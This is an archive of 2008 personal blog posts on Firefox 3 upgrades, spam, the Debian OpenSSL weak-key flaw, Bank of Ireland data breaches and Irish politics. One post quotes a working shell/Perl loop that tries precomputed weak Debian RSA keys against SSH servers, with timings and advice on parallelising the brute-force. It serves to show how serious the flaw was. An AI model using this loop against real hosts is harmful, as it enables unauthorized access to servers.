Published May 30, 2008

I've been talking to a few people recently who read taint.org (thanks!), but don't follow the linkblog. This means they miss half of the good bits I post :( Also, there's no way to comment on linkblog stuff, which is suboptimal.

To remedy this, I'm turning on daily links posting again, where I'll post the day's links, once a day, to the main blog.

If you're not interested, feel free to subscribe to this 'no-links' feed URL instead of the default -- it's the main blog content, but with the links posts filtered out.

Upgrading to Firefox 3

Published May 29, 2008

Firefox 3 Release Candidate 1 was released earlier this month. I've upgraded.

I tried switching to it a couple of months back, but gave up, since my favourite extensions were AWOL. This time around though, they're almost all present. Since Firefox is now basically an operating system in its own right, with upgrade pain all of its own, and a couple of people have asked, here's what I needed to do to get from Firefox 2 to 3:

Make a list of my favoured extensions

Namely, from most important to least:

Create a new Mozilla profile

This allowed me to keep my Firefox 2.0 settings entirely intact, a key step. Install Firefox 3, and start it with "firefox -ProfileManager", then create a new profile and start with that.

Get installing

The following extensions from the above list were available by now for Firefox 3, through addons.mozilla.org:

Firebug was slightly trickier, since you need the ~~1.1 beta version, directly from their site~~ 1.2 beta version, specially designed for Firefox 3 support, available only from their 'releases' page.

However, Greasemonkey, SubmitToTab, and MozEx were still missing. :(

Greasemonkey, thankfully, wasn't too hard to find -- the latest nightly build from this directory does the trick.

MozEx seems dead -- the Firefox 2 support was added in a development snapshot, and there's no sign of Firefox 3 support. This was in danger of becoming a show-stopper, since I spend all day editing text in browser textareas in Trac, Bugzilla, and Wordpress -- until I found It's All Text!, which is even slightly prettier and simpler than MozEx. yay. The only thing to watch out for is that after setting the path to the editor command, I had to quit and restart the browser for it to recognise it as valid.

SubmitToTab is the only desirable plugin remaining. It looks like it won't be making it any time soon, but I'm prepared to live without it. ;)

Also, while discussing this on Twitter, Vipul wondered if XPather was available -- turns out that yes, v1.4 of XPather supports FF3. Looks cool too; I've installed it ;)

Copy bookmarks

Exit the browser, copy the "bookmarks.html" file from the old profile directory (~/.mozilla/firefox/jocfzbfo.jm in my case) to the new one (~/.mozilla/firefox/7bkf89ws.ff3), and restart it.

I didn't bother copying cookies -- I'm happy to log in again on all those sites. (I don't like carrying too much baggage between upgrades...)

I also opened the Greasemonkey user scripts dir (~/.mozilla/firefox/jocfzbfo.jm/gm_scripts), clicked on each script there, and installed them that way to FF3. A little laborious, but nothing serious really.

Done!

End result: I'm using FF3, and it's working quite nicely. Memory usage is consistently below 300MB, so far -- I haven't seen any bloating yet, which is a big improvement. I'm probably going to stick with it.

One thing: I did have to turn off the new image scaling effect, however -- text font size modification also now scales images to match, which is very annoying (and jaggy). No Squint allows this quite neatly.

More details on the “GMail forwarding hole”

Published May 28, 2008

Those INSERT guys who've been talking about a GMail security hole allowing spammers to relay spam, have released more previous-redacted details here. (thanks to the MailChannels blog for pointing that out.)

In essence, the attack works by allowing a spammer to set the "forward to" address in GMail to point at a target address, send a spam to the GMail account, then change the "forward to" address to the next target and repeat.

My response:

it'd be trivial for Google to impose stringent rate limits on "forward to" address changes, and I'd be surprised if they haven't already.
ditto rate-limiting on the rate of forwarding messages for each GMail account.
as they say in the paper -- if Google required up-front confirmation of the target address before forwarding any mail, that would also cut this out neatly.
It's worth noting that GMail's outbound servers may be whitelisted by some recipient sites, others are treating them negatively -- word on the anti-spam "street" is that GMail is becoming a festering pit of 419 scammers these days.

Ammado spam

Published May 26, 2008

Quoting an old job post: 'ammado.com are a new online global community with headquarters in Dublin, Ireland. ammado are developing a fun interactive online entertainment platform catering for a huge global market, using the latest technologies.'

Well, using that and spam, it seems. Look what just arrived in my inbox:

X-Spam-Status: No, score=-8.0 required=5.0 tests=BAYES_50, EXTRA_MPART_TYPE, HABEAS_ACCREDITED_COI, HTML_MESSAGE, RP_MATCHES_RCVD,SPF_PASS shortcircuit=no autolearn=unavailable version=3.3.0-r650054

X-Spam-Relays-External: [ ip=89.101.128.81 rdns=mail.ammado.com helo=mail.ammado.com by=soman.fdntech.com ident= envfrom= intl=0 id=4856CBA51B8 auth= msa=0 ] [ ip=192.168.11.20 rdns= helo=amsrvmail001.ammado.local by=amsrvmail001.ammado.local ident= envfrom= intl=0 id= auth= msa=0 ]

From: Peter Conlon <pconlon/at/ammado.com>

Date: Mon, 26 May 2008 10:45:11 +0100

Subject: UNHCR asks the blogosphere for help

UNHCR and ammado, http://www.ammado.com are reaching out to the blogosphere in an effort to spread the word for this year's World Refugee Day on June 20th and raise awareness of the situation of refugees all over the world!

This year, World Refugee Day is about protection, the heart and soul of UNHCR. With rising oil prices, decreasing food supplies, the adverse affects of climate change, the ongoing crisis in Darfur and a high number of unexpected natural disasters including those in Myanmar and China, the world's refugees have never been more in need of protection.

Another day, another spam. They also spammed Donncha, Michele and Damien, so it sounds like they're doing the rounds of the Irish blogosphere.

(Update: add Tom, Suzy, Alexia, squid at Limerick Blogger, and Grandad at Head Rambles to that list, too.)

However -- the hit on the HABEAS_ACCREDITED_COI SpamAssassin rule means that Ammado are a member of the Habeas Accredited Confirmed-Opt-In program, meaning that they have undertaken a bond to only email people who signed up to receive their communications using "confirmed opt-in". I have never had any dealings with Ammado, or opted in in any way to receive communication from them -- let alone confirmed an opt-in. This is out-and-out unsolicited bulk email, or spam, so this may turn out to be an expensive mistake for Ammado.

If you also got spammed by a Habeas-accredited sender, send a complaint to complaints /at/ habeas.com. This is how the Habeas system works...

PS: This is a good illustration of how spam is not Unsolicited Commercial Email, but UBE -- Unsolicited Bulk Email. Even though this is non-commercial, it's still spam!

MailChannels’ Traffic Control now free-as-in-beer

Published May 19, 2008

I'm on the technical advisory board for MailChannels, a company who make a commercial traffic-shaping antispam product, Traffic Control. Basically, you put it in front of your real MTA, and it applies "the easy stuff" -- greet-pause, early-talker disconnection, lookup against front-line DNSBLs, etc. -- in a massively scalable, event-driven fashion, handling thousands of SMTP connections in a single process. By taking care of 80% of the bad stuff upfront, it takes a massive load off of your backend -- and, key point, off your SpamAssassin setup. ;)

Until recently, the product was for-pay and (relatively) hard to get your hands on, but as of today, they're making it available as a download at http://mailchannels.com/download/. Apparently: "it's free for low-volume use, but high volume users will need a license key."

Anyway, take a look, if you're interested. I think it's pretty cool. (And I'm not just saying that because I'm on their tech advisory board. ;)

LWN.net on the Debian OpenSSL fiasco

Published May 19, 2008

Great article from LWN.net regarding the Debian OpenSSL vulnerability:

It is in the best interests of everyone, distributions, projects, and users, for changes made downstream to make their way back upstream. In order for that to work, there must be a commitment by downstream entities -- typically distributions, but sometimes users -- to push their changes upstream. By the same token, projects must actively encourage that kind of activity by helping patch proposals and proposers along. First and foremost, of course, it must be absolutely clear where such communications should take place.

Another recently reported security vulnerability also came about because of a lack of cooperation between the project and distributions. It is vital, especially for core system security packages like OpenSSH and OpenSSL, that upstream and downstream work very closely together. Any changes made in these packages need to be scrutinized carefully by the project team before being released as part of a distribution's package. It is one thing to let some kind of ill-advised patch be made to a game or even an office application package that many use; SSH and SSL form the basis for many of the tools used to protect systems from attackers, so they need to be held to a higher standard.

+1.

The viability of remote SSH key cracking

Published May 16, 2008

Here's some pretty scary figures from Craig Hughes on the viability of an SSH worm:

when doing this, connecting to localhost:

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@localhost'"'"'); system("ssh-add -D"); $keys = ""; }'

4.63user 3.06system 0:19.54elapsed

ie about 50 per second

when connecting remotely over the internet (ping RTT is ~60ms):

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@example.com'"'"'); system("ssh-add -D"); $keys = ""; }'

1.10user 0.60system 0:35.15elapsed

ie about 6 per second over the internet.

Logging of the failures on the server side looks like this:
May 15 10:53:31 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50445;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:32 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50446;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:33 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50447;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:34 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50448;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:35 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50451;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:36 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50452;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:37 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50453;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:39 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50455;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:40 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50456;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:41 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50457;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:42 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50458;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:43 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50459;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
ie it shows the connection attempt, but NOT the failure. It shows one connection attempt per 7 keys attempted.

So given that:

RSA is the default if you don't specify for ssh-keygen

99.99% of people use x86

PID is sequential, and there's almost certainly an uneven distribution in PIDs used by the keys out there in the wild

then:

Probably there's about 10k RSA keys which are in some very large fraction of the (debian-generated) authorized_keys files out there. These can be attempted in about 1/2 an hour, remotely over the internet. You can hit the full 32k range of RSA keys in an hour and a half. Note that the time(1) output shows how little load this puts on the client machine -- you could easily run against lots of target hosts in parallel; most of the time is spent waiting for TCP roundtrip latencies. Actually, given that, you could probably accelerate the attack substantially by parallelizing the attempts to an individual host so you have lots of packets in flight at any given time. You could probably easily get up towards the 50/s local number doing this, which brings time down to about 3-4 minutes for 10k keys, or 11 minutes for the full 32k keys.

Free SSL cert reissuance for Debian victims — unless you’re on RapidSSL

Published May 16, 2008

If you've been following the Debian OpenSSL pRNG security debacle, you may have noticed that there's a painful problem for people who've used a Debian or Ubuntu system in the process of buying a commercial SSL key -- they are in a situation where those commercially-purchased keys need to be regenerated.

(When an SSL key is obtained from a commercial Certificate Authority, you first have to generate a Certificate Signing Request on your own machine, then send that to the CA, who extracts its contents and applies a signature to produce a valid CA-issued certificate.)

Things are looking up for these victims, though -- some smart cookie at Debian came up with these instructions:

SSL Certificate Reissuance

If you paid good money to have a vulnerable key signed by a Certificate Authority (CA), chances are your CA can re-issue a certificate for free, provided all information in the CSR is identical to the original CSR. Create a new key with a non-vulnerable OpenSSL installation, re-create the CSR with the same information as your original (vulnerable) key's CSR, and submit it to your CA according to their reissuance policy:

GeoTrust: Here (Available throughout the lifetime of the certificate. Tucows/OpenSRS in this case, but the instructions are generic to any GeoTrust client.)

Thawte: Here (Available throughout the lifetime of the certificate.)

VeriSign: Unknown

GoDaddy: Here (Only possible within 30 days of the initial order. GoDaddy calls the process "re-keying", while they call the act of sending you the same signed certificate as your original order a "reissuance".)

ipsCA: Generate a new CSR as if you are purchasing a new certificate, follow through the procedure up until you get to the point where you are required to pay with your credit card. At that point contact support via their email and let them know that you are requesting a revocation and re-issue and include the ticket number of your new CSR request.

CAcert: This is a cost free certification authority. Simply revoke your old certificates and add new ones. (The key has to be created on a fixed machine and ONLY the certification request has to be uploaded!) At the moment the certificate generation will take some time as it seems that many users are re issue there certificate.

Digicert: Login to Your account to re-issue (free).

This is slightly incorrect, however (unfortunately for me). While GeoTrust claim to offer free reissuance of all its SSL certificates, they don't really. Their low-cost RapidSSL certs require that you buy 'reissue insurance' for $20 to avail of this, if you need to reissue more than 7 days after the initial purchase. :( Wiki updated.

Update: RapidSSL certs are, indeed, now free to reissue! Use this URL and click through on the "buy" link for reissuance insurance -- the price quoted will be $0. Wiki re-updated ;). (thanks to ServerTastic for the tip.)

Serious Debian/Ubuntu openssl/openssh bug found

Published May 13, 2008

via Reddit, this Debian Security announcement:

'Luciano Bello discovered that the random number generator in Debian's openssl package is predictable. This is caused by an incorrect Debian-specific change to the openssl package (CVE-2008-0166). As a result, cryptographic key material may be guessable.

It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8c-1 on Debian systems (ie since 2006! --jm) is recreated from scratch. Furthermore, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised; the Digital Signature Algorithm relies on a secret random value used during signature generation.'

and, of course, here's the Ubuntu Security Notice for the hole:

Who is affected

Systems which are running any of the following releases:

Ubuntu 7.04 (Feisty)

Ubuntu 7.10 (Gutsy)

Ubuntu 8.04 LTS (Hardy)

Ubuntu "Intrepid Ibex" (development): libssl <= 0.9.8g-8

Debian 4.0 (etch) (see corresponding Debian security advisory)

and have openssh-server installed or have been used to create an OpenSSH key or X.509 (SSL) certificate. All OpenSSH and X.509 keys generated on such systems must be considered untrustworthy, regardless of the system on which they are used, even after the update has been applied. This includes the automatically generated host keys used by OpenSSH, which are the basis for its server spoofing and man-in-the-middle protection.

It was apparently caused by this incorrect "fix" applied by the Debian maintainers to their package. One wonders why that fix never made it upstream.

Bad news....

Update: Ben Laurie tears into Debian for this:

What can we learn from this? Firstly, vendors should not be fixing problems (or, really, anything) in open source packages by patching them locally - they should contribute their patches upstream to the package maintainers. Had Debian done this in this case, we (the OpenSSL Team) would have fallen about laughing, and once we had got our breath back, told them what a terrible idea this was. But no, it seems that every vendor wants to "add value" by getting in between the user of the software and its author.

+1!

For what it's worth, we in Apache SpamAssassin work closely with our Debian packaging team, tracking the debbugs traffic for the spamassassin package, and one of the Debian packagers is even on the SpamAssassin PMC. So that's one way to reduce the risk of upstream-vs-package fork bugs like this, since we'd have spotted that change going in, and nixed it before it caused this failure.

Here's a question: should the OpenSSL dev team have monitored the bug traffic for Debian and the other packagers? Do upstream developers have a duty to monitor downstream changes too?

This comment puts it a little strongly, but is generally on the money in this regard:

the important part for OpenSSL is to find a way to escape the blame for their fuck-up. They failed to publish the correct contact address for such important questions regarding OpenSSL. Branden (another commenter --jm) noted that the mail address mentioned by Ben is not documented anywhere. It is OpenSSL's responsibility that they allowed the misuse of openssl-dev for offtopic questions and then silently moving the dev stuff to a secret other list nobody outside OpenSSL knew about.

I’m sure Debian is willing to take their fair share of the blame if OpenSSL finally admits that their mistake played a major role here as well. After all the Debian maintainer might have misrepresented the nature of his plans, but he gave warning signs and said he was unsure. But as it appears now all the people who might have noticed secretly left openssl-dev, the documented place for that kind of questions. This is hardly the fault of the maintainer.

Update 2: this Reddit comment explains the hole in good detail:

Valgrind was warning about unitialized data in the buffer passed into ssleay_rand_bytes, which was causing all kinds of problems using Valgrind. Now, instead of just fixing that one use, for some reason, the Debian maintainers decided to also comment out the entropy mixed in from the buffer passed into ssleay_rand_add. This is the very data that is supposed to be used to see the random number generator; this is the actual data that is being used to provide real randomness as a seed for the pseudo-random number generator. This means that pretty much all data generated by the random number generator from that point forward is trivially predictable. I have no idea why this line was commented out; perhaps someone, somewhere, was calling it with uninitialized data, though all of the uses I've found were with initialized data taken from an appropriate entropy pool.

So, any data generated by the pseudo-random number generator since this patch should be considered suspect. This includes any private keys generated using OpenSSH on affected Debian systems. It also includes the symmetric keys that are actually used for the bulk of the encryption.

A pretty major fuck-up, all told.

Update 3: Here's a how-to page on wiki.debian.org put together by the folks from the #debian IRC channel. It has how-to information on testing your keys for vulnerability using a script called 'dowkd.pl', details of exactly what packages and keys are vulnerable, and instructions on how to regenerate keys in each of the (many) affected apps.

It notes this about Apache2 SSL keys:

According to folks in #debian-security, if you have generated an SSL key (normally the step just prior to generating the CSR, and then sending it off to your SSL certificate provider), then the certificate should be considered vulnerable.

So, bad news -- SSL keys will need to be regenerated. Add 'costly' to the list of downsides. (Yet another update: this hasn't turned out quite that badly after all -- many CAs are now offering free reissuance of affected certs.)

Looking at 'dowkd.pl', it gets even worse for ssh users. It appears the OpenSSH packages on affected Debian systems could only generate 1 of only 262148 distinct keypairs. Obviously, this is trivial to brute-force. With a little precomputation (which would only take 14 hours on a single desktop!), an attacker can generate all of those keypairs, and write a pretty competent SSH worm. :(

Update: voila, precomputed keypairs, and figures on the viability of remote brute-forcing the keyspace in 11 minutes.

Full-text RSS bookmarklet

Published May 12, 2008

This site offers a nifty utility for dealing with those annoying sites which offer only partial text content in their RSS and Atom feeds.

Given an RSS or Atom feed's URL, the CGI will iterate through the posts in the feed, scrape the full text of each post from its HTML page, and re-generate a new RSS feed containing the full text.

The one thing it's missing is a one-click bookmarklet version. So here it is:

Full-text RSS Bookmarklet

Drag that to your bookmarks menu, and next time you're looking at a partial-text feed, click the bookmark to transform the viewed page into the full-text version. Enjoy!

Guinness in Ireland dodges a bullet

Published May 10, 2008

Phew! The rumours were untrue. Diageo will not be closing down the Guinness brewery in Dublin 8, and will continue brewing the black stuff in Dublin 8, thankfully:

Diageo is to close its breweries at Kilkenny and Dundalk, significantly reduce its brewing capacity at St James's Gate and build a new brewery on the outskirts of Dublin under a plan announced today.

The company said it would invest EUR 650 million (£520 million) between 2009 and 2013 in the restructuring.

The renovation of the St James's Gate brewing operations is expected to cost around EUR 70 million and will see the volume of Guinness brewed there fall from around one billion pints a year, to just over 500 million.

This plant will serve the Irish and British markets and will be based on the Thomas St side of the site. The company said this would ensure that every pint of Guinness sold in Ireland would be brewed here. Approximately half of the 55 acre site will then be sold once the five-year project is complete.

Around 65 staff will remain in brewing operations at St James's Gate with about 100 others due to transfer to the new Dublin plant. Although the company has yet to announce the exact location of its new brewery, the company says it will have a capacity of around nine million hectolitres, or around three times that of the refurbished St James's Gate site. This new brewery will produce Guinness for export and ales and lagers for the Irish market.

Diageo said when the two Dublin breweries are fully operational in five years time it will transfer brewing out of the Kilkenny and Dundalk breweries and close these plants. This move will result in 'a net reduction in staff of around 250', the company said.

The company employs 800 people in its brewing operation and a total of 2,500 in the Republic and Northern Ireland.

Diageo said these two plants "do not have the scale necessary for sustained success in increasingly competitive market conditions".

The company said it would offer those employees relocation opportunities where possible. Those for whom relocation is not possible will be offered "a severance package alongside career counselling".

Operations at its Waterford brewery will be "streamlined" as part of the re-organisation leading to "some reduction in output". the current workforce of 27 in Waterford would be reduced to 'around 18' but Diageo was unable to confirm the extent of the output reduction.

The company says the St James's Gate site it proposes to sell and the Kilkenny and Dundalk sites have an estimated value of EUR 510 million.

The Guinness Storehouse, which receives around 900,000 visitors a year, will continue to be based at St. James's Gate.

The company estimates it will incur one-off costs of EUR 152 million during the restructuring and says this would be treated as an exceptional cost in the fiscal year ending in June 2008.

Paul Walsh, chief executive of Diageo said: 'Over the last twelve months we have conducted a rigorous review of our brewing operations in Ireland. It examined many options and I believe it has identified the right formula for the long-term success of our business in Ireland and for the continued global success of the Guinness brand.'

"Our ambition is to combine the most modern brewing standards with almost 300 years of brewing tradition, craft and heritage."

Guinness has been brewed at St James's Gate for almost 250 years. Guinness extract produced at the Dublin site is exported to more than 45 countries.

the Lisbon Treaty and Libertas’ astroturf

Published May 8, 2008

So, Irish voters will soon be voting in a state-wide referendum on the upcoming Treaty of Lisbon -- the latest set of amendments to how the European Union is run.

Since ratification will require changes to the Irish constitution, we get to vote on these intricacies where most EU inhabitants do not. Unfortunately this means it's not particularly "sexy" -- it's a pretty obtuse and boring set of issues, and deciding which way to vote is not easy, with such snore-worthy stuff at stake.

One of the organisations campaigning for a "no" vote in the referendum is called Libertas. Aileen forwarded on a very interesting article by Chekov Feeney on Indymedia Ireland about them, which is well worth a read if you're interested in Irish politics and the international reach of US lobbying. Here's some snippets:

Declan Ganley, president of Libertas, happens to be president of Rivada Networks, a US defence contractor (they supply emergency communications networks to the US intelligence community).

[...]

On Sunday April 20th, Libertas announced that Ulick McEvaddy was "joining the No To Lisbon Campaign" and publicised the event with a photo-opportunity of the two 'entrepreneurs' in front of the Libertas Campaign bus. McEvaddy is the first member of the Irish business and political elite to join the Libertas campaign since it emerged under the stewardship of Declan Ganley.

What's particularly interesting about this is that McEvaddy is the CEO of Omega Air, a US defence contractor (they supply cargo planes and inflight refuelling services to the US military). [...] According to the [ US Air Force's Integrator Magazine ], "industry insiders say [McEvaddy's] company has even approached U.S. intelligence agencies about tanking services for detainee transfers, to reduce dependence on foreign air fields." In other words, offering to provide inflight refuelling services to rendition flights so that they wouldn't have to stop over at foreign airports such as Shannon on their way to "interrogate" suspects. A very accommodating offer indeed.

McEvaddy was also the figure who got himself appointed to the board of Knock airport with a view to opening it up to US military flights.

Nice guys, then.

The article goes on, and on, and on, detailing some shady transactions involving these guys and their US military/intelligence connections, the "astroturf" nature of the Libertas organisation, and the odd behaviour of the Libertas campaign in general.

It comes to this conclusion:

This article has examined the reality behing the Libertas campaign, the connections of its two high-profile backers, the implausibility of its message, the peculiar nature of its campaign and some of the underlying strategic differences at play. The conclusion is that the evidence suggests that Libertas is most likely to serve primarily as a vehicle for advancing US strategic interests.

Check it out -- it's a must-read.

BoI data breach: a sample customer notification

Published May 2, 2008

More on the Bank of Ireland 30,000-customer data breach (which is up to 31,500 people by now -- BoI promised to contact the "affected" customers by post, warning them that their data had been leaked. If you were wondering what those letters might look like, wonder no more. Here's one, via a friend who found himself in this unenviable position:

So it's not just name, date of birth, and address -- he notes that they've leaked 'information on the current account I use to pay for the policy.'

Interestingly, he says that his life assurance policy was set up directly with their life assurance department, not via the local branch -- which directly contradicts what BoI say on their website:

The laptops contained information relating to some customers who either obtained a quote or took out a Life Assurance policy with Bank of Ireland Life from the following branches: [... list of branches omitted...]

The update from 28 April doesn't clarify this, either. Hmm.

Google Webmaster Tools now includes ‘goog-love.pl’

Published May 1, 2008

Back in 2006, I wrote a script I called "goog-love.pl"; it used Google's now-dead SOAP search API (thanks, Nelson!) to figure out which Google queries your web site was "winning" on. Unfortunately, Google shut down new signups for the SOAP interface later that year.

I was just looking through Google's Webmaster Tools page for taint.org, when I came across the Statistics / Top search queries page:

This is exactly what goog-love.pl produced. hooray!

Bank of Ireland: “we don’t understand fraud”

Published April 28, 2008

Check out this logic from the Bank of Ireland, spotted by waider in today's news:

Last week, the bank said that medical records, bank account details, names, addresses and dates of birth of 10,000 customers were on the laptops. [...]

Bank of Ireland said an assessment had concluded that the risk of fraud arising from the thefts was 'very low', as the data on the laptops did not include bank account passwords, PINs or copies of signatures.

So a fraudster would have medical records, bank account details, names, addresses and dates of birth of 10,000 customers, but the risk of fraud is 'very low'? Incredible.

Update: make that 30,000 customers.

Update 2: 31,500 customers, and a sample letter.

Merry Spamiversary

Published April 27, 2008

Peter G. Neumann at the RISKS Forum notes that Last Friday was the anniversary of the sending of the first e-mail spam:

[Thanks to Mike Hogsett for noting this event, and Brad Templeton for recording it.]

What is allegedly the very first spam message was sent roughly 30 years over the ARPANET.

In seeing this, Mike was amused because he works with some of the people it was addressed to, of whom a few are still at SRI: NEUMANN@SRI-KA, GARVEY@SRI-KL, MABREY@SRI-KL, WALDINGER@SRI-KL and some of whom are retired: ENGELBART@SRI-KL, NIELSON@SRI-KL, GOLDBERG@SRI-KL (I am always amused when some of these old ARPANET addresses show up in today's incarnations of spam.)

Also somewhat before Mike's time, Geoff Goodfellow, Eric Kunzelman, Dan Lynch, and many others at SRI were instrumental in the evolution of the ARPANET.

Also included in the enormous enumerated TO: list (historically interesting in itself by not having been suppressed!) are Bill English (who was the catalyst for much of Doug Engelbart's innovations being transitioned from SRI to PARC), Dave Farber, Irv Jacobs, Bob Metcalfe, Jon Postel (who by then had moved from SRI to ISI), three Sutherlands, and Lauren Weinstein, to name just a few.

Happy Birthday, Spam! Sorry I cannot wish you many happy returns.

What’s on this site, April 2008 edition

Published April 25, 2008

It's been a while since I've listed the various sub-sites of taint.org in one post. I've just updated the taint.org wiki's index page to include them, so might as well list them here, too:

my blog - you're reading it ;)
IrishPulse - a site to aggregate the live updates of scores of Irish Twitter and Jaiku users.
Irish Blogs Top 100 By Technorati Rank - a 'Top 100' list of Irish weblogs, based on Technorati's readership-estimation data.
Nearly-Live Planetary Desktop Backgrounds - desktop-sized high-quality PNG images of near-real-time cloud and satellite data, to create a nifty, nearly-live world map.
the C=64-izer - turn an image into something like what it'd look like on a Commodore 64.
Spicylinks - an automated link-blog summarizer similar to HotLinks, but open source.
the wiki.
Planet Antispam - syndicating a collection of anti-spam blogs.

Enjoy!

Bank of Ireland’s 10,000-customer security breach

Published April 22, 2008

Bank of Ireland, one of Ireland's biggest high-street banks, was the subject of a breach notification yesterday -- 4 laptops, containing unencrypted "sensitive personal information" about up to 10,000 customers, were stolen between June and October 2007. It seems the Irish Data Protection Commissioner was not informed until last Friday. The Financial Regulator is also looking into the incidents.

According to the Independent, the laptops 'were being used by staff working for Bank of Ireland's life assurance division. They contained the information about medical history, life assurance details, bank account details, names and addresses.'

This breach has raised quite a few issues.

First off, I was watching Questions and Answers last night, and was shocked by the naivete of the assembled panel. One panelist, for example, reckoned that common criminals wouldn't understand the value of this data -- so it was probably nothing to worry about!

There was absolutely no concept of how widespread identity theft has become -- using stolen identity information to apply for credit cards is part of Petty Theft 101 these days, since filling out forms is a lot easier than breaking and entering, obviously. There was also no appreciation of how little protection Irish consumers have in this regard with current Irish banking T&Cs.

According to previous research, about 2% of accounts compromised in data breaches become victim to identity theft.

Some comments from the bank from those articles:

'The data was not encrypted, although it is understood there was software security installed on the stolen computers.'

Doubtless, "software security" refers to some kind of useless Maginot Line boondoggle like Norton Internet Security. This would have absolutely no useful effect in this case. The only useful way to protect customer data on a stolen laptop is to use encrypted storage.

'In the interim the bank has monitored all of these customer accounts and can confirm that there has been no evidence of fraudulent or suspicious activity.'

This is a fallacy. This data provides plenty of information regarding the customer's identity -- information which is useful to receive loans and credit fraudulently, elsewhere. Monitoring the bank's accounts is of no help in that case. On top of that, identity information like your date of birth, mother's maiden name, health status, and so on doesn't expire -- that info will still be useful for identity theft, 10 years from now, or as a stepping-stone to further fraud.

As John O'Shea noted on Twitter earlier, there was nothing on their website about it this morning; there is now, however -- a broken link on the front page. oops!

Figuring out the puzzle and fixing the URL's errors gets you to this page, which notes:

The laptops contained information relating to some customers who either obtained a quote or took out a Life Assurance policy with Bank of Ireland Life from the following branches:

Drogheda

Dunleer

Bagnelstown

Court Place Carlow

Stephens Green

Tallaght

Montrose

Anybody who is not a customer of these branches is not affected by this incident.

As far as I can make out, the bank didn't issue this breach notification. It appears from the coverage that this information was first announced by Data Protection Commissioner Billy Hawkes to RTE yesterday, leaving the bank apparently scrambling to catch up:

"The thefts of the laptops were only brought to the attention of the appropriate authorities in the bank in the past number of weeks," Bank of Ireland said in a statement that offered no other explanation for the long delay.

It would have been so much better if BoI had been proactive with breach notification -- examples from overseas have illustrated its value. As Adam Shostack has noted repeatedly over the past few years: the rules have changed.

As for repercussions for BoI, it'll be interesting to see if anything happens. For "live" customer data on up to 10,000 customers to be stored, in unencrypted form, on a laptop is terrible security practice -- but as far as I know, there are no laws or regulations requiring anything better in Ireland, unfortunately. :( However:

Consideration will be given as to what further action will be sought from Bank of Ireland to ensure that the obligations contained in the Data Protection Acts in this area are met.

On a broader level, this issue serves to highlight once again the absolute necessity for all organisations in the public and private sector to take their data protection responsibilities seriously. In particular, all organisations should be assessing immediately the necessity for storing personal data on laptops. If a need is found, appropriate security measures such as encryption should be put in place immediately.

Go Billy! ;)

The best thing to come out of Caerphilly

Published April 21, 2008

Caerphilly is a small commuter town in South Wales, notable mainly for Caerphilly cheese and a castle.

Well, you can add one more thing to that list; its inhabitants also provided some key data in a major health study, from which emerged one great finding -- it turns out that if you're male, sex twice a week reduces the risk of death from heart disease by about half:

Men who said they had sex twice a week had a risk of dying half that of the less passionate participants who said they had sex once a month, Dr. Davey-Smith's team said.

No other risk factor showed a statistically significant link to the frequency of orgasm.

The authors said that they had tried to adjust the study's design to account for a factor that might explain the findings -- that healthier, fitter men with more healthy life styles engaged in more sex. Even so, they could not explain the differences in risk. Hormonal effects on the body resulting from frequent sex could be among other possible explanations for the findings, Dr. Davey-Smith said.

Here's the science bit, via the BMJ -- a paper entitled 'Sex and death: are they related? Findings from the Caerphilly cohort study':

Result: Mortality risk was 50% lower in the group with high orgasmic frequency than in the group with low orgasmic frequency, with evidence of a dose-response relation across the groups. Age adjusted odds ratio for all cause mortality was 2.0 for the group with low frequency of orgasm (95% confidence interval 1.1 to 3.5, test for trend P=0.02). With adjustment for risk factors this became 1.9 (1.0 to 3.4, test for trend P=0.04). Death from coronary heart disease and from other causes showed similar associations with frequency of orgasm, although the gradient was most marked for deaths from coronary heart disease. Analysed in terms of actual frequency of orgasm, the odds ratio for total mortality associated with an increase in 100 orgasms per year was 0.64 (0.44 to 0.95).

Conclusion: Sexual activity seems to have a protective effect on men's health.

The perfect excuse ;) Thanks, Caerphilly!

My commute vs Jaffa Cakes

Published April 18, 2008

Last weekend, I picked up a super-cheap cycling computer in Aldi for 20 Euros. I cycle to work, and I thought it'd be fun to get some geeky number-crunching in on my daily commute.

Here are the figures for my trip into work:

Ride time: 12:16
Trip distance: 2.4 miles
Avg speed: 12.7 MPH
Max speed: 22.4 MPH
Total KCal work performed: 136
Max pulse rate: 146

